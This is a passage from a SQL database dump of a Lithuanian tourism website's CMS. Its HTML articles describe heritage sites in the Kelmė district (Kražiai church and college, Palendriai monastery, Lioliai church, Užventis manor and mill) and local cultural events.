www.trp.lt</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<p><strong><span style=\"font-size: 19px;\">Kražių Švč. Mergelės Marijos Nekaltojo Prasidėjimo bažnyčia</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kpaveldas/nekaltojo_baznycia/{/gallery}</td>\r\n<td>\r\n<p><span>1891 m. Rusijos caras, siekiant sumažinti katalikiškų vienuolynų ir bažnyčių skaičių, davė įsakymą uždaryti Kražių benediktinių vienuolyną, jo bažnyčią ir kapines, o seseris perkelti į Kauno to paties pavadinimo vienuolyną. </span></p>\r\n<p><span>Kražių gyventojai kreipėsi į visas instancijas prašydami neuždaryti vienuolyno bažnyčios. Į tai nebuvo atsižvelgta. 1893 m. vienuolės prievarta išvežtos į Kauną. Apie tai sužinoję žmonės pradėjo rinktis ir budėti dieną ir naktį pasiryžę neleisti uždaryti bažnyčios. <span>1893 m. lapkričio 22 – 23 d. tarp taikių vietos gyventojų ir caro valdininkų bei kazokų įvyko kruvinas susirėmimas. Jo metu žuvo 9 žmonės, apie 50 buvo sužeista. 1894 m. vyko kražiškių teismas. Buvo apkaltinta 70 žmonių.</span></span></p>\r\n<p><span>Šis įvykis plačiai nuskambėjo visame pasaulyje, visuomenė pasipiktino caro vykdyta politika ir jo valdininkų žiaurumu. Šis įvykis buvo pavadintas Kražių skerdynėmis ir tapo simboliu, ginant katalikų tikėjimą ir lietuvybę ateinančioms kartoms. <span>Nepaisant šio žmonių pasipriešinimo bažnyčia ir vienuolynas buvo uždaryti iki pat 1908 m. 1910 m. parapijiečiams leista šia bažnyčia naudotis kaip parapine.</span></span></p>\r\n<p><span>Šiuo metu bažnyčia yra veikianti. Atvykę turistai gali apžiūrėti dvibokštę, barokinio stiliaus bažnyčią, dominuojančią miestelio panoramoje. Viduj vis dar tebestovi suolas menantis kraupias Kražių skerdynes. Pasakojama, kad prie jo kazokai buvo pririšę savo arklius. Bažnyčios interjere dominuoja centrinis barokinis altorius. Taip pat čia galima išvysti didžiausius Žemaitijoje vargonus.</span></p>\r\n<p><span>Vienuolės benediktinės Kražiuose įsikūrė 1639 m. Joms dovanotame žemės sklype buvo pastatyti vienuolynas ir bažnyčia. Pasenus mediniams vienuolyno pastatams,1757 – 1762 m. buvo pastatyta mūro bažnyčia. Ją suprojektavo buvęs Kražių jėzuitų kolegijos ir Vilniaus universiteto profesorius jėzuitas, matematikas, architektas Tomas Žebrauskas. Bažnyčiai buvo suteiktas Švč. Mergelės Marijos Nekaltojo Prasidėjimo titulas.</span></p>\r\n<p><span><strong>Adresas: </strong>M.K. Sarbievijaus g. 45, LT-86274 Kražiai</span></p>\r\n<p><span><strong>Bažnyčia atidaryta:</strong></span></p>\r\n<p><span>Šiokiadieniais pamaldų metu</span><br /><span>Sekmadienį – 11.30-14.30 val.</span></p>\r\n<p><span>Piligrimams ir ekskursijoms bažnyčia atrakinama laiką suderinus iš anksto su parapijos klebonu.</span></p>\r\n<p><span>Telefonas (8 427) 58 349</span></p>\r\n<p><span>Interneto svetainė www.kraziai.lt</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td><strong><span style=\"font-size: 19px;\">Kražių kolegija</span></strong></td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kpaveldas/kraziu_kolegija/{/gallery}</td>\r\n<td>\r\n<p>Kražių miestelio, išsidėsčiusio abipus Kražantės, senoji dalis saugoma kaip urbanistikos kultūros vertybė. Vienas istorinių paminklų čia – išlikęs renesansinis buvusios jėzuitų kolegijos pastatas (XVII a. pradžia).</p>\r\n<p>Tai dalis kažkada Kražiuose buvusio didžiulio jėzuitų pastatų komplekso.</p>\r\n<p>Vienuoliai jėzuitai Kražiuose įsikūrė 1608 m. 1614 m. J. R. Chodkevičius jiems užrašė 7 kaimus, o 1615 m. Mikalojus Kristupas Radvila dovanojo žemės sklypą su nebaigta statyti pilimi.</p>\r\n<p>Jėzuitai pilį pertvarkė ir 1616 m. įkūrė Kražių kolegiją, svarbiausią Žemaitijos švietimo ir religinio gyvenimo centrą.</p>\r\n<p>Maždaug 4 ha plote buvo pastatyti net 24 įvairios paskirties pastatai: vienuolyno – kolegijos pastatas (3 korpusai), bažnyčia, mokykla, ūkiniai pastatai, mūrinis malūnas, alaus darykla ir kt.</p>\r\n<p>Bažnyčia, kurios dabar išlikę tik pamatų akmenys, buvo puošniausia to meto Žemaitijos šventovė. Joje buvo 12 altorių, kuriuose kabėjo puikūs tapybos darbai.</p>\r\n<p>Bažnyčia koridoriumi jungėsi su pietiniu korpusu (dabar išlikusiu kolegijos pastatu). 1773 m. jėzuitams išsikėlus iš Kražių, pastatai buvo apleisti, pergyveno daug šeimininkų.</p>\r\n<p>Daugumą jų vienas iš savininkų A. Pšeciševskis nugriovė, o pietinį korpusą išnuomojo gyventojams ir įstaigoms. Vėliau šis pastatas atiteko kitiems savininkams.</p>\r\n<p>2000 m. Kelmės rajono savivaldybė jį išpirko ir čia buvo pradėti renovavimo darbai, kurie baigti 2008 m. Dabar čia įsikūrė Kražių M. K. Sarbievijaus kultūros centras.</p>\r\n<p>Adresas: Kolegijos g. 5, Kražiai</p>\r\n<p>Tel.: (8 427) 58 148, 8 616 06 043</p>\r\n<div>Muziejaus tel. 8 622 21 321, (8 427) 58 155</div>\r\n<div>Kultūros centro el. paštas <a href=\"mailto:el.p.kraziukc@gmail.com\">kraziukc@kraziai.</a>lt</div>\r\n<div>Kultūros centro TIC el. paštas kraziai.turizmas@kraziai.lt</div>\r\n<div>Interneto svetainė www.kraziai.lt</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<p><strong><span style=\"font-size: 19px;\">Palendrių Šv. Benediktino vienuolynas</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kpaveldas/benedikto_vienuolynas/{/gallery}</td>\r\n<td><span>Palendrių Šv. Benedikto vienuolynas yra įsikūręs Palendrių kaime, Kelmės rajone. <span>Nuostabi monumentali gamta - iškilios kalvos, įvedančios į Žemaičių aukštumą, aukštas dangus, Vainagių girios, besitęsiančios ligi Kurtuvėnų, pakraštyje.</span></span>\r\n<p><span>Visi norintys gali eiti į vienuolyno bažnyčią ir melstis kartu su vienuoliais. Prireikus lankytojai gali kreiptis į tėvą durininką. Vienuolyne galima užsakyti šv. Mišias norimomis intencijomis. Priimamajame galima rasti atvirukų su vienuolyno vaizdais, mišiolėlių ir maldų knygelių, įsigyti norimą grigalinio giedojimo įrašų diską, medalėlį, rožinį.</span></p>\r\n<p><span>Lankytojai gali paprašyti suteikti galimybę atlikti išpažintį arba pasikalbėti rūpimais dvasiniais klausimais su patyrusiu vienuoliu, mokančiu išklausyti ir padėti suvokti, kaip Viešpats kviečia kiekvieną konkrečiai gyventi tikinčiojo krikščionio gyvenimą. Vienuoliai pasirinko ir visą savo gyvenimą paskyrė Dievo ieškojimui. Patyrę, kaip veikia Dievas, jie gali supratimu, patarimu bei malda padėti ieškančiam pašaukimo, norinčiam pagilinti tikėjimo ar maldos gyvenimą, besirengiančiam priimti Santuokos sakramentą, išgyvenančiam sunkumus arba patiriančiam pagundas.<br /></span></p>\r\n<p>Kontaktiniai duomenys:<br /> Šv. Benedikto vienuolynas<br /> Tel. (8 427) 474 98, faks. (8 427) 47 497</p>\r\n<p>Viešbutėlis <br /> Vienuolyno viduje tik vyrams <br /> Tel. (8 427) 474 98</p>\r\n<p>Svečių namai „Aušros žvaigždė“ <br /> Šalia vienuolyno šeimoms ir moterims <br /> Tel. (8 427) 47 470 <br /> Mob. +370 613 13 018</p>\r\n<p>Interneto svetainė www.palendriai.lt</p>\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1><strong><span style=\"font-size: 19px;\">Liolių Šv. Simono ir Judo Tado bažnyčia</span></strong></h1>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kpaveldas/tado_baznycia/{/gallery}</td>\r\n<td>\r\n<p>1517 m. liepos 23 d. Vilniuje surašytu dokumentu broliai Martynas ir Lukas Viekavičiai fundavo Liolių bažnyčią. Tuo metu I-ą kartą paminėta ir jau stovinti šv. Mikalojaus titulo bažnyčia Lioliuose. Sunku tiksliau pasakyti kada buvo pastatyta bažnyčia – ji galėjo jau stovėti ir prieš 1517 m., įrengta dar abiejų fundatorių tėvo.</p>\r\n<p>Išlikusi bažnyčia – taip pat viena seniausių medinių bažnyčių Lietuvoje, pasižyminti išskirtine architektūra, puošniu interjeru, kuriame gausu autentiškų XVIII –XIX a. paminklų.</p>\r\n<p>Liolių parapinė bažnyčia – vienas geriausiai išlikusių seniausios medinės bažnyčių architektūros pavyzdys Žemaitijoje.</p>\r\n<p>Liolių bažnyčios viduje vertingiausias XVIII a. pabaigoje sukurtas didysis altorius. Nors jis vėliau buvo ne kartą perdažytas, taisytos kai kurios dekoratyvinės detalės, vėlyvojo baroko altoriaus kompozicija ir puošybinė drožyba išliko.</p>\r\n<p>Altorių puošia XVIII a. pabaigoje sukurtos skulptūrų poros: apačioje – šv. Kazimiero ir Stanislovo, aukščiau – pirmųjų krikščionių kankinių šv. Stepono ir Lauryno, o viršutiniame tarpsnyje – šv. Simono ir Judo Tado, kurių garbei dedikuota bažnyčia, skulptūros.</p>\r\n<p>Įdomūs ir vertingi greičiausiai Rytų Prūsijoje 1808 m. sukurti bažnyčios vargonai. Instrumentas šiandien jau prastos būklės, tačiau neabejotinai vienas seniausių šiame regione. Vargonų prospektas puoštas barokinėmis ir klasicistinėmis detalėmis.</p>\r\n<p>Adresas: Liolių miestelis, Kelmės r.</p>\r\n<p>Tel. (8 <span>427) 44 140 </span></p>\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<p><strong style=\"font-size: 19px;\">Užvenčio dvaro sodybos svirnas</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kpaveldas/uzvencio_svirnas/{/gallery}</td>\r\n<td>\r\n<p><span>Užvenčio kraštotyros muziejus įkurtas 1965 m. Nuo 1973 m. muziejus yra įsikūręs restauruotame Užvenčio dvaro svirne. </span></p>\r\n<p><span>Šis dvaras garsus tuo, kad čia 1887–1898 m. gyveno rašytoja Marija Pečkauskaitė-Šatrijos Ragana. Čia prabėgo patys geriausi rašytojos metai, čia ji sėmėsi įkvėpimo ir patiems vertingiausiems savo kūriniams – „Sename dvare“, „Viktutė“. </span></p>\r\n<p><span>Vėliau šis iki šių dienų išlikęs dvaras priklausė Lietuvos Nepriklausomybės Akto signatarui Jonui Smilgevičiui (1870–1942). </span></p>\r\n<p><span>Muziejuje parengtos ekspozicijos byloja apie šiuos garsius žmones; pateikiama medžiaga apie Užvenčio miestelio istoriją. 2012 m. muziejaus pastatas buvo restauruotas, ekspozicijos atnaujintos.</span></p>\r\n<p>Užvenčio dvaro svirne įrengta muziejaus ekspozicija, susidedanti iš trijų dalių : vaizdus pasakojimas apie Užvenčio dvare gyvenusią rašytoją Šatrijos Raganą , Lietuvos Nepriklausomybės akto signatarą Joną Smilgevičių bei Užvenčio krašto istoriją.</p>\r\n<p>Įrengta parodų salė, kuri naudojama edukaciniams užsiėmimams organizuoti.</p>\r\n<p>Adresas: Dvarčiaus k., Užvenčio sen., Kelmės r. <br />Tel.: 8 682 14008</p>\r\n<p>Interneto svetainė www.kelmesmuziejus.lt</p>\r\n<p><strong>Darbo laikas:</strong><br />Muziejus lankomas kiekvieną dieną, antradieniais – penktadieniais nuo 13 val. iki 17 val., kitu laiku – iš anksto susitarus.</p>\r\n<p>Muziejų prižiūri ir lankytojus priima Milda Knyzelienė.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Užvenčio malūnas</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kpaveldas/uzvencio_malunas/{/gallery}</td>\r\n<td><span>Užvenčio vandens malūno ir spirito varyklos pastatas – vienas iš buvusio Užvenčio dvaro sodybos teritorijoje išlikusių pastatų.</span>\r\n<p class=\"pjusttify\"><span>Jau 1759 m. Užventyje veikė malūnas ant Ventos upės ir „bravoras“. Į Ventos tvenkinį šakas sumerkę gluosniai dar mena čia gyvenusią ir vertingiausius savo kūrinius – „Sename dvare“ ir „Viktutė“ – sukūrusią rašytoją Šatrijos Raganą.</span></p>\r\n<p class=\"pjusttify\"><span>Šiandien Užvenčio vandens malūnas prikeltas naujam gyvenimui. Atkurta senoji turbina gamina elektros energiją, restauruotos malūno salės laukia pokylio svečių. Įrengtas sveikatingumo kompleksas su baseinu, pirtimi, treniruoklių sale, viešbutis, konferencijų salė.</span></p>\r\n<p class=\"pjusttify\"><span>Visa šiaurine Ventos pakrante nuo 2003 m. įrengtas sveikatingumo takas, papuoštas tilteliais ir liaudies meistrų medžio darbais.</span></p>\r\n<p class=\"pjusttify\"><span>Einat šiuo taku galima grožėtis nuostabia gamta, netikėtai atsiveriančiomis malūno perspektyvomis ir ypač nuostabiais saulėlydžiais.</span></p>\r\n<p><span>Adresas: P. Višinskio g. 28, Užventis, Kelmės r.</span></p>\r\n<p><span>Mob.: 8 682 14 007 (Alvydas), 8 682 14 008 (Milda)</span></p>\r\n<p><span>El. paštas info@uzvenciomalunas.lt<a href=\"mailto:uzvencio-malunas@info.lt\" target=\"_self\"><span><br /></span></a></span></p>\r\n<p><span>Interneto svetainė <a href=\"http://www.uzvenciomalunas.lt/\" target=\"_self\"><span>www.uzvenciomalunas.lt</span></a></span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,0,0,52,'2013-05-28 11:18:02',135,'','2018-06-12 11:22:43',135,0,'0000-00-00 00:00:00','2013-05-28 11:18:02','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',53,0,11,'','',1,18998,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(204,291,'XI Tarptautinis Tytuvėnų vasaros festivalis prasidėjo','xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo','','<p> <a href=\"index.php/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/204-xi-tarptautinis-tytuvenu-vasaros-festivalis-prasidejo\" title=\"XI Tarptautinis Tytuvėnų vasaros festivalis prasidėjo\" rel=\"bookmark\">XI Tarptautinis Tytuvėnų vasaros festivalis prasidėjo</a></p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\">Birželio 15 d. Tytuvėnų bernardinų bažnyčios ir vienuolyno ansamblyje kompozitorės Zitos Bružaitės kantorija „Lumen Fidei“ prasidėjo XI tarptautinis Tytuvėnų vasaros festivalis.</p>\r\n','\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\"> </p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\">Festivalio koncertai vyksta gražiausiose krašto koncertinėse erdvėse: Tytuvėnų bažnyčioje ir vienuolyne, Kelmės ir Baisogalos dvaruose, Kurtuvėnuose, Joniškio bažnyčioje.</p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\">Šiemet festivalio meno vadovas, dirigentas, Lietuvos nacionalinės premijos laureatas Robertas Šervenikas parengė 14 koncertinių programų, pritaikytų visoms paminėtoms koncertinėms erdvėms. Kurtuvėnuose skamba džiazas, Kelmės ir Baisogalos dvaruose – kamerinė muzika, Joniškio bažnyčioje – sakralinės choro „Polifonija“ muzikos koncertas. Didieji koncertai su Lietuvos kameriniu orkestru, solistais ir muzikantų kolektyvais iš kitų šalių skambės Tytuvėnuose.</p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\">Atidarymo koncertas buvo skirtas Tytuvėnų bažnyčios ir vienuolyno ansamblio 400 metų jubiliejui. Bažnyčios fundatoriui, LDK vėliavininkui Andriejui Valavičiui už didelę auką – žemės sklypą, pinigus ir statybines medžiagas naujos bažnyčios statybai specialiu raštu paskirtas prieš 400 metų, festivalio organizatoriai padėkojo žodžiu ir Tytuvėnų lauko gėlių krepšiu, tuo primindami apie garbingą mecenatystės misiją, prieš 400 metų pradėtą šiame krašte. Pasidžiaugta, kad mecenatystės tradicija tęsiama ir šiandien, padėkota Tytuvėnų festivalio globėjui, Tytuvėnų mecenatui agrarinių mokslų daktarui Jonui Jagminui.</p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\">Tytuvėnų fasaros festivalis rengiamas Lietuvos kultūros tarybos, Kelmės rajono savivaldybės ir rėmėjų lėšomis. Festivalis baigsis rugpjūčio 22 dieną.<br /><br />VšĮ Tytuvėnų festivalis informacija<br /><br /></p>',1,0,0,56,'2014-06-26 10:17:33',135,'','2018-06-13 09:34:33',135,0,'0000-00-00 00:00:00','2014-06-26 10:17:33','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/tytuvenu_festivalis\\/vasaros_festivalis_2014.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/stories\\/tytuvenu_festivalis\\/vasaros_festivalis_2014.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',19,0,4,'','',1,4071,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(243,331,'blank','blank','','<p><em>.</em></p>','',-2,0,0,56,'2015-07-07 06:03:00',135,'','2015-07-07 06:06:17',135,0,'0000-00-00 00:00:00','2015-07-07 06:03:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,1,'','',1,770,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(205,292,'V. Kalvaičio 85-erių metų jubiliejaus minėjimas','vlado-kalvaicio-85-eriu-metu-jubiliejaus-minejimas','','<p>Popietė skirta Vlado Kalvaičio 85-erių metų jubiliejaus progai paminėti. Liepos 9 d. 15 val. Tytuvėnų bernardinų vienuolyno refektorinėje salėje.</p>\r\n','\r\n<p><img src=\"images/stories/naujienos/vladas_kalvaitis_large.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2014-07-01 12:25:16',135,'','2014-07-01 12:26:07',135,0,'0000-00-00 00:00:00','2014-07-01 12:25:16','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/vladas_kalvaitis.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,163,'','',1,3900,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(261,349,'Edukacinė valanda - VERBA','edukacine-valanda-verba','','<p style=\"text-align: justify;\">KVIEČIAME DALYVAUTI</p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Verba –  kadagio, žilvičio ar gluosnio vytelių bei kitų augalų šakelių ryšulėlis.</span></p>\r\n','\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Verbų sekmadienis  tai Velykų, Kristaus prisikėlimo šventės, įžanga, kai tikintieji į bažnyčias traukia su verbomis, kur jos šventinamos. Verbų sekmadienį eiti bažnyčion be puokštelės nedera. Verbos yra patys spalvingiausi ir formų įvairove labiausiai išsiskiriantys lietuvių tautodailės kūriniai.</span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Edukacinėje valandėlėje prisiminsime senąsias tradicijas, bandysime jas interpretuoti, susirišime verbą iš praėjusios vasaros sausažiedžių ir iš žolynų kurių galima prisirinkti ir dabar miškuose, pievose ir pelkėse. Prie senųjų tradicijų pridėsime kiekvienas kažką nuo savęs.</span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"> </span></p>\r\n<p><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">KASDIEN, PENKIAS DIENAS IKI VERBŲ SEKMADIENIO KVIEČIAME Į EDUKACINĘ VALANDĄ TYTUVĖNŲ BERNARDINŲ VIENUOLYNE.<br />Būtina registracija iki 2016-03-11<br />Visa informacija tel. mob.+370 678 77676<br />VšĮ \"Tytuvėnų piligrimų centras\" </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/verba/verba1.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2016-02-21 19:19:57',135,'','2016-02-21 19:23:07',135,135,'2016-02-21 19:23:07','2016-02-21 19:19:57','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/verba\\/verba.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,118,'','',1,3310,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(206,293,'Galerija','galerija','','<p><strong>Akimirkos iš žygio keliu \"Via Gratiarum\" </strong>{gallery cols=3 orientation=horizontal  width=300}stories/naujienos/zygis_via/{/gallery}</p>\r\n<p> </p>\r\n<p><strong>Akimirkos iš <span>10 metų jubiliejaus minėjimo </span></strong><span>{gallery cols=5 orientation=horizontal width=166}stories/apiecentra/galerija/jubiliejaus_minejimas{/gallery}</span></p>\r\n<p><span> </span></p>\r\n<p><strong>Akimirkos iš edukacinės programos \"Nuo Verbų sekmadienio iki vaikų velykėlių\"</strong><span>{gallery cols=5 orientation=horizontal width=166}stories/apiecentra/galerija/verbu_sekmadienis{/gallery}</span></p>\r\n<p><br /><strong>Popietė rašytojo Vlado Kalvaičio 85 -erių metų jubiliejui.</strong><span>{gallery cols=5 orientation=horizontal 